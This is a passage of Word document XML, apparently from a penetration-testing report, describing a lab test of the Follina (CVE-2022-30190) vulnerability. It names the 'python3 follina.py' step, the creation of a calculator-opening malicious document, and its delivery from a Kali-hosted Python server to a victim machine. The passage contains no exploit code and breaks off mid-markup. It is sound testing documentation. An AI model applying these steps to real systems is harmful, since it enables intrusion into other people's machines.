          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="_Toc113190754"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PHASE TWO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
    </w:p>
    <w:p w14:paraId="0C2E58CD" w14:textId="28DB5A80" w:rsidR="00287D2A" w:rsidRDefault="00115BDD" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the results from the vulnerability scan of Organisation A, </w:t>
      </w:r>
      <w:r w:rsidR="0067301D">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00AB416D">
        <w:t xml:space="preserve"> were tested</w:t>
      </w:r>
      <w:r w:rsidR="0067301D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FDB552" w14:textId="7FF89D8D" w:rsidR="001F4591" w:rsidRDefault="0069728F" w:rsidP="001F4591">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="_Toc113190755"/>
      <w:r>
        <w:t>5.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001F4591" w:rsidRPr="00C728C4">
        <w:t>Follina – CVE 2022-30190 – Severity Level 7.8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="319"/>
    </w:p>
    <w:p w14:paraId="3C2BEEF7" w14:textId="645108FC" w:rsidR="00212C68" w:rsidRDefault="00C5516F" w:rsidP="001F4591">
      <w:r>
        <w:t xml:space="preserve">MSDT-Follina was downloaded as set out in chapter </w:t>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:t>4.4.</w:t>
      </w:r>
      <w:r w:rsidR="00711490">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:t xml:space="preserve">. The directory was changed to MSDT-Follina and the ‘python3 follina.py’ command was run as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BECF6F" w14:textId="59DAE65B" w:rsidR="00212C68" w:rsidRDefault="005C26F5" w:rsidP="00212C68">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251793408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC42041" wp14:editId="18546DAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1436370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>607060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2373630" cy="392430"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="56" name="Rectangle 56"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2373630" cy="392430"/>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01B4C4" id="Rectangle 56" o:spid="_x0000_s1026" style="position:absolute;margin-left:113.1pt;margin-top:47.8pt;width:186.9pt;height:30.9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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1868969E" wp14:editId="0F40A5E5">
            <wp:extent cx="3208020" cy="1714884"/>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89">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2084" t="7921" r="15068" b="7896"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3224804" cy="1723856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC61257" w14:textId="1343DDCC" w:rsidR="00212C68" w:rsidRDefault="00212C68" w:rsidP="00212C68">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc111363635"/>
      <w:bookmarkStart w:id="321" w:name="_Toc111363772"/>
      <w:bookmarkStart w:id="322" w:name="_Toc111981797"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>72</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Command 'python3 follina.py'</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
      <w:bookmarkEnd w:id="321"/>
      <w:bookmarkEnd w:id="322"/>
    </w:p>
    <w:p w14:paraId="149B3EB0" w14:textId="2003E213" w:rsidR="00212C68" w:rsidRDefault="00212C68" w:rsidP="00212C68">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5004AEFF" w14:textId="5A21B077" w:rsidR="00212C68" w:rsidRDefault="00212C68" w:rsidP="00212C68">
      <w:r>
        <w:t xml:space="preserve">This creates the ‘Follina Document’ that includes the payload (currently to open the calculator) on the victim machine as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>73.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF3671B" w14:textId="4375031B" w:rsidR="00212C68" w:rsidRDefault="005C26F5" w:rsidP="005C26F5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251777024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06BE16D9" wp14:editId="43A2B484">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2426970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>977265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="880110" cy="723900"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Rectangle 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="880110" cy="723900"/>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2AA020" id="Rectangle 40" o:spid="_x0000_s1026" style="position:absolute;margin-left:191.1pt;margin-top:76.95pt;width:69.3pt;height:57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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251785216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203F4D17" wp14:editId="4EA504C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1554480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>748665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1402080" cy="228600"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="55" name="Rectangle 55"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1402080" cy="228600"/>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F85270" id="Rectangle 55" o:spid="_x0000_s1026" style="position:absolute;margin-left:122.4pt;margin-top:58.95pt;width:110.4pt;height:18pt;z-index:251785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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212C68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF27547" wp14:editId="1681FCAC">
            <wp:extent cx="4430776" cy="2613660"/>
            <wp:effectExtent l="0" t="0" r="825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90">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2806" t="1484" r="6377" b="36202"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4439327" cy="2618704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0503EA" w14:textId="173F389A" w:rsidR="005C26F5" w:rsidRDefault="005C26F5" w:rsidP="005C26F5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc111363636"/>
      <w:bookmarkStart w:id="324" w:name="_Toc111363773"/>
      <w:bookmarkStart w:id="325" w:name="_Toc111981798"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>73</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creation of the Follina.doc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
      <w:bookmarkEnd w:id="324"/>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="75589BF5" w14:textId="7FC656FB" w:rsidR="00212C68" w:rsidRDefault="00212C68" w:rsidP="00212C68"/>
    <w:p w14:paraId="7FC13463" w14:textId="5F7E726B" w:rsidR="001F4591" w:rsidRDefault="00212C68" w:rsidP="001F4591">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The IP address of the Kali Linux machine was noted</w:t>
      </w:r>
      <w:r w:rsidR="005C26F5">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C26F5">
        <w:t>and a python server was created as demonstrated in figure</w:t>
      </w:r>
      <w:r w:rsidR="00034838">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C8706B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00034838">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005C26F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5675243D" w14:textId="023754E7" w:rsidR="005C26F5" w:rsidRDefault="005C26F5" w:rsidP="00034838">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251801600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BE84B9D" wp14:editId="14BADDF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>586740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1521460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1257300" cy="266700"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="760259159" name="Rectangle 760259159"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1257300" cy="266700"/>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6C0378" id="Rectangle 760259159" o:spid="_x0000_s1026" style="position:absolute;margin-left:46.2pt;margin-top:119.8pt;width:99pt;height:21pt;z-index:251801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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CAF9B7C" wp14:editId="0340168B">
            <wp:extent cx="5128260" cy="2186940"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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91">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="4257" b="19438"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5135395" cy="2189983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0CBA8" w14:textId="015FA0A9" w:rsidR="00034838" w:rsidRDefault="00034838" w:rsidP="00034838">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc111363637"/>
      <w:bookmarkStart w:id="327" w:name="_Toc111363774"/>
      <w:bookmarkStart w:id="328" w:name="_Toc111981799"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Kali IP Address</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
      <w:bookmarkEnd w:id="327"/>
      <w:bookmarkEnd w:id="328"/>
    </w:p>
    <w:p w14:paraId="4030EEA5" w14:textId="0695CF54" w:rsidR="00034838" w:rsidRDefault="00034838" w:rsidP="00034838"/>
    <w:p w14:paraId="3C3F7CFE" w14:textId="7E399B16" w:rsidR="00034838" w:rsidRDefault="00034838" w:rsidP="00034838">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1197DA" wp14:editId="6F9FE1FC">
            <wp:extent cx="4709160" cy="1264827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259161" name="Picture 760259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92">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="3897" t="4878" r="26797" b="25204"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4711188" cy="1265372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFA89C" w14:textId="4F45A712" w:rsidR="00034838" w:rsidRDefault="00034838" w:rsidP="00034838">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc111363638"/>
      <w:bookmarkStart w:id="330" w:name="_Toc111363775"/>
      <w:bookmarkStart w:id="331" w:name="_Toc111981800"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>75</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creation of a Python Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w14:paraId="4078EA58" w14:textId="6E2CC8E8" w:rsidR="00034838" w:rsidRDefault="00034838" w:rsidP="00034838"/>
    <w:p w14:paraId="4724679D" w14:textId="219DC88A" w:rsidR="00034838" w:rsidRDefault="00FE6E3A" w:rsidP="00034838">
      <w:r>
        <w:t xml:space="preserve">The server was used to download the ‘follina.doc’ onto the victim machine rather than use an email which would have been the case in a real-world scenario as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F43D2A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CFEDB" w14:textId="227C200A" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2C0B9F" wp14:editId="510A7F0D">
            <wp:extent cx="4953000" cy="2628900"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="760259172" name="Picture 760259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93">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="7313" t="7256" r="6271" b="21231"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="2628900"/>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0EE5DF66" w14:textId="6A80E4E1" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="332" w:name="_Toc111363639"/>
      <w:bookmarkStart w:id="333" w:name="_Toc111363776"/>
      <w:bookmarkStart w:id="334" w:name="_Toc111981801"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>76</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Download 'follina.doc' onto victim machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="333"/>
      <w:bookmarkEnd w:id="334"/>
    </w:p>
    <w:p w14:paraId="45640D6C" w14:textId="77777777" w:rsidR="00FE6E3A" w:rsidRPr="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00AC65F0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130DC6F9" w14:textId="614E66A5" w:rsidR="00034838" w:rsidRDefault="00A23F22" w:rsidP="00FE6E3A">
      <w:r>
        <w:t xml:space="preserve">Once Follina is on the victim’s machine it can be opened. </w:t>
      </w:r>
      <w:r w:rsidR="00FE6E3A">
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00AC65F0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FE6E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F43D2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC65F0">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00AC65F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE6E3A">
        <w:t xml:space="preserve">demonstrate the opening of the Follina.doc </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">illustrating the </w:t>
      </w:r>
      <w:r w:rsidR="00FE6E3A">
        <w:t>connecti</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00FE6E3A">
        <w:t>n to the python server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBAC51" w14:textId="7F828AF9" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251809792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="632F15FC" wp14:editId="47A21246">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3044190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2614295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1261110" cy="240030"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="760259176" name="Rectangle 760259176"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1261110" cy="240030"/>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43F5C5" id="Rectangle 760259176" o:spid="_x0000_s1026" style="position:absolute;margin-left:239.7pt;margin-top:205.85pt;width:99.3pt;height:18.9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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0108177A" wp14:editId="37B8CA66">
            <wp:extent cx="5401240" cy="3310890"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="22860"/>
            <wp:docPr id="760259175" name="Picture 760259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94">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4520" t="2044" r="18701" b="25587"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5409124" cy="3315723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>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E1A761B" w14:textId="1FBA508B" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc111363640"/>
      <w:bookmarkStart w:id="336" w:name="_Toc111363777"/>
      <w:bookmarkStart w:id="337" w:name="_Toc111981802"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>77</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Connecting to the Server to open follina.doc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>
      <w:bookmarkEnd w:id="336"/>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w14:paraId="6C60D5CF" w14:textId="6B568B0E" w:rsidR="00FE6E3A" w:rsidRDefault="00FE6E3A" w:rsidP="00FE6E3A"/>
    <w:p w14:paraId="72218A80" w14:textId="35C654A9" w:rsidR="00AC65F0" w:rsidRDefault="00AC65F0" w:rsidP="00AC65F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251817984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="064A0B0F" wp14:editId="1EAA5614">
                <wp:simplePos x="0" y="0"/>
